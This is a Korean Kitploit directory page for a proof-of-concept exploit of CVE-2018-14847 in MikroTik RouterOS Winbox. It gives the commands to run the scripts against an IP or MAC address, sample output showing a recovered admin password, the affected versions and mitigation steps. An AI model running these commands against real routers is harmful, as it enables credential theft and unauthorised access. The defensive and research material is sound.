Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/sinichi449/python-mikrotikloginexploit
ReconnaissancePassword AttacksVulnerability AnalysisExploitationInformation GatheringNetwork Security
GitHubsinichi449/python-mikrotikloginexploit

Python-MikrotikLoginExploit

간단한 스크립트를 이용한 CVE-2018-14847 Mikrotik 취약점 PoC

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
2126년 전Kitploit 검토 완료

Mikrotik 로그인 익스플로잇

Mikrotik 취약점 CVE-2018-14847(주로 winbox)의 PoC(Proof of Concept)로, 기본 포트 8291에서 RouterOS로부터 직접 비밀번호를 읽어오는 방식으로 작동합니다.

원작자: https://github.com/BigNerd95/

요구 사항

  • Python 3+

Linux 설치

root@kitploit:~
apt install python3

사용 예시

WinBox (TCP/IP)

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

예:

root@kitploit:~
$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123

MAC 주소 사용하기

IP 주소 없이도 이 스크립트를 사용할 수 있습니다.

MACServerDiscovery.py를 사용하여 라우터를 스캔하세요.

root@kitploit:~
python3 MACServerDiscover.py

예:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

공격(Exploit):

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

예:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123

취약한 버전

2015-05-28부터 2018-04-20까지 출시된 RouterOS

RouterOS 버전:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

자세한 정보: https://blog.mikrotik.com/security/winbox-vulnerability.html

익스플로잇 예방

  • RouterOS를 6.42+로 업그레이드
  • Winbox 비활성화
  • 서비스 차단:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • 필터 규칙(ACL), 포트 8291 차단:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • MAC 주소에서 Winbox 로그인 액세스 제한:
root@kitploit:~
/tool mac-server mac-winbox
도구 다운로드